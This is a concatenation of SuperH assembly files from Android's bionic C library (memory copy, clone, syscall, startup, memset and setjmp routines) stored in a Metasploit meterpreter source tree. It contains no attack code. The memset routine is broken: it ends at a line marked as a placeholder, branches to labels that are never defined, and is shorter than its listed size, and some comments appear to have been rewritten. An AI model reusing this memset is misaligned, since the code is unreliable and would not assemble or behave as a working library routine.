cmp/hi r1,REG_LEN /* while ( len > 3 ) { */
bf/s no_align_delay
tst REG_LEN,REG_LEN
2:
mov.l @REG_SRC+,r0 /* *((unsigned long*)dst)++ = *((unsigned long*)src)++; */
add #-4,REG_LEN /* len -= 4; */
mov.l r0,@REG_DST
cmp/hi r1,REG_LEN
bt/s 2b
add #4,REG_DST /* } */
bra no_align_delay
tst REG_LEN,REG_LEN
word_align:
/* src and dst differ in bit 1 only: 2-byte chunks are the best */
mov r1,r0
tst #1,r0
bf/s no_align_delay
tst REG_LEN,REG_LEN /* if ( len == 0 ) return; */
bt bcopy_return
mov REG_SRC,r0 /* if ( src & 1 ) */
tst #1,r0
bt 1f
mov.b @REG_SRC+,r0 /* *dst++ = *src++; */
add #-1,REG_LEN
mov.b r0,@REG_DST
add #1,REG_DST
1:
mov #1,r1
cmp/hi r1,REG_LEN /* while ( len > 1 ) { */
bf/s no_align_delay
tst REG_LEN,REG_LEN
2:
mov.w @REG_SRC+,r0 /* *((unsigned short*)dst)++ = *((unsigned short*)src)++; */
add #-2,REG_LEN /* len -= 2; */
mov.w r0,@REG_DST
cmp/hi r1,REG_LEN
bt/s 2b
add #2,REG_DST /* } */
no_align:
/* misaligned pair: fall back to a byte loop for the remainder */
tst REG_LEN,REG_LEN /* while ( len != 0 ) { */
no_align_delay:
bt bcopy_return
1:
mov.b @REG_SRC+,r0 /* *dst++ = *src++; */
add #-1,REG_LEN /* len--; */
mov.b r0,@REG_DST
tst REG_LEN,REG_LEN
bf/s 1b
add #1,REG_DST /* } */
bcopy_return:
rts
#ifdef REG_DST0
mov REG_DST0,r0 /* delay slot: return the original dst */
#else
nop
#endif
bcopy_overlap:
/* backward copy: start from one past the last byte of each buffer */
add REG_LEN,REG_SRC
add REG_LEN,REG_DST
mov REG_SRC,r0
xor REG_DST,r0
and #3,r0
mov r0,r1
tst r0,r0 /* (src ^ dst) & 3 */
bf/s ov_word_align
ov_longword_align:
tst REG_LEN,REG_LEN /* if ( len==0 ) return; (also bf/s delay slot) */
bt/s bcopy_return
mov REG_SRC,r0
tst #1,r0 /* if ( src & 1 ) */
bt 1f
add #-1,REG_SRC /* *--dst = *--src; */
mov.b @REG_SRC,r0
mov.b r0,@-REG_DST
add #-1,REG_LEN
1:
mov #1,r0
cmp/hi r0,REG_LEN /* if ( (len > 1) && */
bf/s 1f
mov REG_SRC,r0
tst #2,r0 /* (src & 2) { */
bt 1f
add #-2,REG_SRC /* *--((unsigned short*)dst) = *--((unsigned short*)src); */
mov.w @REG_SRC,r0
add #-2,REG_LEN /* len -= 2; */
mov.w r0,@-REG_DST /* } */
1:
mov #3,r1
cmp/hi r1,REG_LEN /* while ( len > 3 ) { */
bf/s ov_no_align_delay
tst REG_LEN,REG_LEN
2:
add #-4,REG_SRC
mov.l @REG_SRC,r0 /* *((unsigned long*)dst)++ = *((unsigned long*)src)++; */
add #-4,REG_LEN /* len -= 4; */
cmp/hi r1,REG_LEN
bt/s 2b
mov.l r0,@-REG_DST /* } */
bra ov_no_align_delay
tst REG_LEN,REG_LEN
ov_word_align:
mov r1,r0
tst #1,r0
bf/s ov_no_align_delay
tst REG_LEN,REG_LEN /* if ( len == 0 ) return; */
bt bcopy_return
mov REG_SRC,r0 /* if ( src & 1 ) */
tst #1,r0
bt 1f
add #-1,REG_SRC
mov.b @REG_SRC,r0 /* *--dst = *--src; */
add #-1,REG_LEN
mov.b r0,@-REG_DST
1:
mov #1,r1
cmp/hi r1,REG_LEN /* while ( len > 1 ) { */
bf/s ov_no_align_delay
tst REG_LEN,REG_LEN
2:
add #-2,REG_SRC
mov.w @REG_SRC,r0 /* *--((unsigned short*)dst) = *--((unsigned short*)src); */
add #-2,REG_LEN /* len -= 2; */
cmp/hi r1,REG_LEN
bt/s 2b
mov.w r0,@-REG_DST /* } */
ov_no_align:
tst REG_LEN,REG_LEN /* while ( len != 0 ) { */
ov_no_align_delay:
bt 9f
1:
add #-1,REG_SRC
mov.b @REG_SRC,r0 /* *--dst = *--src; */
add #-1,REG_LEN /* len--; */
tst REG_LEN,REG_LEN
bf/s 1b
mov.b r0,@-REG_DST /* } */
9:
rts
#ifdef REG_DST0
mov REG_DST0,r0 /* delay slot: return the original dst */
#else
nop
#endif
|
OpenWireSec/metasploit | 2,492 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/clone.S | /*
* Copyright (C) 2009 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <sys/linux-syscalls.h>
.text
.type __pthread_clone, @function
.globl __pthread_clone
.align 4
/*
 * __pthread_clone(fn, child_stack, flags, arg)
 * In: r4 = fn, r5 = child_stack (top), r6 = flags, r7 = arg
 * Pushes fn and arg onto the child stack, invokes clone(2), and in
 * the child pops them back and tail-calls __thread_entry(arg? fn?
 * -- see register order below).  In the parent, returns the kernel's
 * result; on error returns -1 (note: errno is NOT set here).
 */
__pthread_clone:
/* insert the args onto the new stack */
mov r5, r0
mov.l r4, @-r0 /* func */
mov.l r7, @-r0 /* arg */
/* do the system call */
mov r6, r4 /* Set clone_flags. new sp is ready in r5. */
mov.l 0f, r3
trapa #(4 + 0x10) /* trap number = 0x10 + number of syscall args */
/* check error */
cmp/pz r0
bf __error
/* check if parent or child */
cmp/pl r0
bt __return /* positive result: parent, return child tid */
/* child (r0 == 0): prepare args for __thread_entry */
mov #8, r1
sub r1, r15 /* -8 */ /* point sp at the two words pushed above */
mov.l @r15+, r5 /* +4 */ /* arg */
mov.l @r15+, r4 /* +4 */ /* func */
mov r15, r6 /* tls */ /* sp is back at child_stack top; used as tls */
/* jump to __thread_entry */
mov.l 1f, r0
jmp @r0
nop
__error:
mov #-1, r0
__return:
rts
nop
.align 2
0: .long __NR_clone
1: .long __thread_entry
/* XXX: TODO: Add __bionic_clone here
 * See bionic/bionic_clone.c and arch-arm/bionic/clone.S
 * for more details...
 */
OpenWireSec/metasploit | 1,499 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/__get_sp.S | /*
* Copyright (C) 2009 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
.text
.type __get_sp, @function
.globl __get_sp
.align 4
/* void *__get_sp(void): return the caller's stack pointer. */
__get_sp:
rts
mov r15, r0 /* delay slot: r0 = sp */
|
OpenWireSec/metasploit | 1,572 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/crtend.S | /*
* Copyright (C) 2009 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
/* crtend: linked last, so these zero words terminate the structor
 * arrays begun with -1 sentinels in crtbegin_*.S */
.section .preinit_array, "aw"
.long 0
.section .init_array, "aw"
.long 0
.section .fini_array, "aw"
.long 0
.section .ctors, "aw"
.long 0
|
OpenWireSec/metasploit | 2,128 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/_exit_with_stack_teardown.S | /*
* Copyright (C) 2009 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <asm/unistd.h>
.text
.type _exit_with_stack_teardown, @function
.globl _exit_with_stack_teardown
.align 4
# void _exit_with_stack_teardown(void * stackBase, int stackSize, int retCode)
# Unmaps the thread's own stack then exits; must not touch the stack
# after the munmap, so everything lives in registers.  Never returns.
_exit_with_stack_teardown:
mov r6, r8 /* save retCode : breaks r8 value */
/* munmap(stackBase, stackSize): args are already in r4/r5 */
mov.l 0f, r3 /* system call number */
trapa #(2 + 0x10) /* invoke system call with num of args */
mov r8, r4 /* restore retCode */
mov.l 1f, r3 /* system call number */
trapa #(1 + 0x10) /* invoke system call with num of args */
/* exit() should never return, cause a crash if it does */
mov #0, r0
mov.l @r0, r0 /* deliberate NULL load -> fault */
.align 2
0: .long __NR_munmap
1: .long __NR_exit
|
OpenWireSec/metasploit | 3,069 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/crtbegin_dynamic.S | /*
* Copyright (C) 2009-2010 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
.text
.align 4
.type _start,#function
.globl _start
# this is the small startup code that is first run when
# any executable that is dynamically-linked with Bionic
# runs.
#
# its purpose is to call __libc_init with appropriate
# arguments, which are:
#
# - the address of the raw data block setup by the Linux
# kernel ELF loader
#
# - address of an "onexit" function, not used on any
# platform supported by Bionic
#
# - address of the "main" function of the program. We
# can't hard-code it in the adr pseudo instruction
# so we use a tiny trampoline that will get relocated
# by the dynamic linker before this code runs
#
# - address of the constructor list
#
_start:
mov r15, r4 /* arg 1: raw data block = initial stack pointer */
mov #0, r5 /* arg 2: onexit, unused */
mov.l 0f, r6 /* arg 3: &main, via the literal pool below */
mova 2f, r0 /* arg 4: the structors table at 2f */
mov r0, r7
mov.l 1f, r0
jmp @r0 /* tail-call __libc_init; it never returns here */
nop
.balign 4
0: .long main
1: .long __libc_init
/* table of the four structor-array addresses passed to __libc_init */
2: .long __PREINIT_ARRAY__
.long __INIT_ARRAY__
.long __FINI_ARRAY__
.long __CTOR_LIST__
# the .ctors section contains a list of pointers to "constructor"
# functions that need to be called in order during C library initialization,
# just before the program is being run. This is a C++ requirement
#
# the last entry shall be 0, and is defined in crtend.S
#
.section .preinit_array, "aw"
.globl __PREINIT_ARRAY__
__PREINIT_ARRAY__:
.long -1
.section .init_array, "aw"
.globl __INIT_ARRAY__
__INIT_ARRAY__:
.long -1
.section .fini_array, "aw"
.globl __FINI_ARRAY__
__FINI_ARRAY__:
.long -1
.section .ctors, "aw"
.globl __CTOR_LIST__
__CTOR_LIST__:
.long -1
#include "__dso_handle.S"
|
OpenWireSec/metasploit | 1,506 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/__get_pc.S | /*
* Copyright (C) 2009 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
.text
.type __get_pc, @function
.globl __get_pc
.align 4
/* void *__get_pc(void): return a PC value inside this function --
 * the address of the nop at label 1 (which is also the rts delay
 * slot).  mova computes a 4-byte-aligned PC-relative address. */
__get_pc:
mova 1f, r0
rts
1: nop
|
OpenWireSec/metasploit | 2,134 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/syscall.S | /*
* Copyright (C) 2009 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <sys/linux-syscalls.h>
.text
.type syscall, @function
.globl syscall
.align 4
/*
* Current implementation assumes that the all syscall
* has maximum 7 arguments.
*/
syscall:
	/*
	 * long syscall(long number, ...)   (SuperH / Linux, max 7 args)
	 *
	 * In:  r4 = syscall number; r5, r6, r7 plus four caller-stack
	 *      words = the (up to 7) syscall arguments.
	 * The kernel wants the number in r3 and the arguments in
	 * r4-r7, r0-r2, so every value is shifted down one slot.
	 * Out: r0 = result on success, or -1 with errno set on failure.
	 */
	/* get args */
	mov	r4, r3		/* r3 = system call number */
	mov	r5, r4		/* shift the register arguments down */
	mov	r6, r5
	mov	r7, r6
	mov.l	@r15, r7	/* remaining args come from the stack */
	mov.l	@(4, r15), r0
	mov.l	@(8, r15), r1
	mov.l	@(12, r15), r2
	/* invoke trap: the trap number encodes the argument count */
	trapa	#(7 + 0x10)	/* assuming 7 arguments */
	/* check return value: negative means -errno */
	cmp/pz	r0
	bt	end
	/*
	 * Error path.  jsr clobbers pr, so the caller's return address
	 * must be saved around the call (previously it was not, so the
	 * final rts could never return to the caller).  __set_errno
	 * consumes the negative result and returns -1, which we keep
	 * as our own return value instead of restoring the raw -errno.
	 */
	sts.l	pr, @-r15
	mov.l	0f, r1
	jsr	@r1		/* __set_errno(result) -> r0 = -1 */
	mov	r0, r4		/* delay slot: pass result as argument */
	lds.l	@r15+, pr
end:
	rts
	nop			/* delay slot */
	.align	2
0:	.long	__set_errno
|
OpenWireSec/metasploit | 6,921 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/memset.S | /* $OpenBSD: memset.S,v 1.1.1.1 2006/10/10 22:07:10 miod Exp $ */
/* $NetBSD: memset.S,v 1.1 2005/12/20 19:28:50 christos Exp $ */
/*-
* Copyright (c) 2002 SHIMIZU Ryo. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. The name of the author may not be used to endorse or promote products
* derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
* OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
* IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include <machine/asm.h>
#define REG_PTR r0
#define REG_TMP1 r1
#ifdef BZERO
# define REG_C r2
# define REG_DST r4
# define REG_LEN r5
#else
# define REG_DST0 r3
# define REG_DST r4
# define REG_C r5
# define REG_LEN r6
#endif
/*
 * void *memset(void *dst, int c, size_t len)  -- or, when built with
 * -DBZERO, void bzero(void *dst, size_t len).
 *
 * SuperH implementation (OpenBSD/NetBSD).  Register roles come from
 * the REG_* macros above: REG_DST = destination, REG_C = fill value,
 * REG_LEN = length, REG_PTR / REG_TMP1 = scratch, and (memset only)
 * REG_DST0 preserves the original dst for the return value.
 *
 * Strategy:
 *   len <  12 : unrolled backward byte loop.
 *   len <  28 : computed jump into a ladder of byte/word stores
 *               (each store is a 2-byte instruction, so the entry
 *               offset is derived directly from len).
 *   len >= 28 : align both ends to 4 bytes, fill 32 bytes per
 *               iteration, finish with a 4-byte store ladder.
 *
 * NOTE: branches suffixed /s execute the following instruction in
 * the branch delay slot.
 */
#ifdef BZERO
ENTRY(bzero)
#else
ENTRY(memset)
	mov	REG_DST,REG_DST0	/* for return value */
#endif
	/* small amount to fill ? */
	mov	#28,REG_TMP1
	cmp/hs	REG_TMP1,REG_LEN	/* if (len >= 28) goto large; */
	bt/s	large
	mov	#12,REG_TMP1		/* if (len >= 12) goto small; */
	cmp/hs	REG_TMP1,REG_LEN
	bt/s	small
#ifdef BZERO
	mov	#0,REG_C
#endif
	/* very little fill (0 ~ 11 bytes) */
	tst	REG_LEN,REG_LEN		/* len == 0 ? */
	add	REG_DST,REG_LEN		/* REG_LEN = dst + len (end pointer) */
	bt/s	done
	add	#1,REG_DST		/* loop stops when end reaches dst+1 */
	/* unroll 4 loops: store backwards from the end */
	cmp/eq	REG_DST,REG_LEN
1:	mov.b	REG_C,@-REG_LEN
	bt/s	done
	cmp/eq	REG_DST,REG_LEN
	mov.b	REG_C,@-REG_LEN
	bt/s	done
	cmp/eq	REG_DST,REG_LEN
	mov.b	REG_C,@-REG_LEN
	bt/s	done
	cmp/eq	REG_DST,REG_LEN
	mov.b	REG_C,@-REG_LEN
	bf/s	1b
	cmp/eq	REG_DST,REG_LEN
done:
#ifdef BZERO
	rts
	nop
#else
	rts
	mov	REG_DST0,r0		/* return the original dst */
#endif

small:
	/* 12..27 bytes: dispatch on destination alignment */
	mov	REG_DST,r0
	tst	#1,r0			/* dst 2-byte aligned ? */
	bt/s	small_aligned
	mov	REG_TMP1,REG_TMP1	/* (placeholder -- see below) */
|
OpenWireSec/metasploit | 3,390 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/_setjmp.S | /* $OpenBSD: _setjmp.S,v 1.2 2007/03/02 06:11:54 miod Exp $ */
/* $NetBSD: _setjmp.S,v 1.7 2006/01/05 02:04:41 uwe Exp $ */
/*-
* Copyright (c) 1990 The Regents of the University of California.
* All rights reserved.
*
* This code is derived from software contributed to Berkeley by
* William Jolitz.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. Neither the name of the University nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* from: @(#)_setjmp.s 5.1 (Berkeley) 4/23/90
*/
#include <machine/asm.h>
#include <machine/setjmp.h>
/*
* C library -- _setjmp, _longjmp
*
* _longjmp(a,v)
* will generate a "return(v)" from the last call to
* _setjmp(a)
* by restoring registers from the stack.
* The previous signal state is NOT restored.
*/
ENTRY(_setjmp)
	/*
	 * int _setjmp(jmp_buf env)   -- r4 = env  (SuperH)
	 * Saves the callee-saved machine state into env, writing from
	 * the top of the buffer downwards.  The signal mask is NOT
	 * saved; two dummy slots keep the layout compatible with
	 * setjmp's buffer.  Returns 0.
	 */
	xor	r0, r0			/* r0 = 0: return value / dummy slots */
#if defined(__SH4__) && !defined(__SH4_NOFPU__)
	add	#(_JBLEN * 4), r4	/* point one past the end of env */
	sts	fpscr, r1		/* r1 = caller's fpscr */
	mov.l	r1, @-r4		/* save fpscr */
	lds	r0, fpscr		/* put fpscr in a known state for fmov.s */
	sts.l	fpul, @-r4
	fmov.s	fr15, @-r4		/* callee-saved FP regs, current bank */
	fmov.s	fr14, @-r4
	fmov.s	fr13, @-r4
	fmov.s	fr12, @-r4
	frchg				/* switch FP register banks */
	fmov.s	fr15, @-r4		/* callee-saved FP regs, other bank */
	fmov.s	fr14, @-r4
	fmov.s	fr13, @-r4
	fmov.s	fr12, @-r4
	lds	r1, fpscr		/* restore the caller's fpscr */
#else
	add	#((_JBLEN - 10) * 4), r4	/* no FPU: skip the FP slots */
#endif
	sts.l	mach, @-r4		/* multiply-accumulate state */
	sts.l	macl, @-r4
	mov.l	r15, @-r4		/* stack pointer */
	mov.l	r14, @-r4		/* frame pointer + callee-saved GPRs */
	mov.l	r13, @-r4
	mov.l	r12, @-r4
	mov.l	r11, @-r4
	mov.l	r10, @-r4
	mov.l	r9, @-r4
	mov.l	r8, @-r4
	sts.l	pr, @-r4		/* return address */
	mov.l	r0, @-r4	/* dummy signal mask */
	rts				/* return 0 (in r0) */
	mov.l	r0, @-r4	/* no saved signal mask */

	SET_ENTRY_SIZE(_setjmp)
ENTRY(_longjmp)
	/*
	 * void _longjmp(jmp_buf env, int val)  -- r4 = env, r5 = val
	 * Restores the state saved by _setjmp and "returns" val from
	 * the original _setjmp call site (1 if val == 0, so _setjmp
	 * never appears to return 0 twice).  Signal mask is NOT
	 * restored.
	 */
	add	#8, r4			/* skip the two (unused) mask slots */
	lds.l	@r4+, pr		/* saved return address */
	mov.l	@r4+, r8		/* callee-saved GPRs */
	mov.l	@r4+, r9
	mov.l	@r4+, r10
	mov.l	@r4+, r11
	mov.l	@r4+, r12
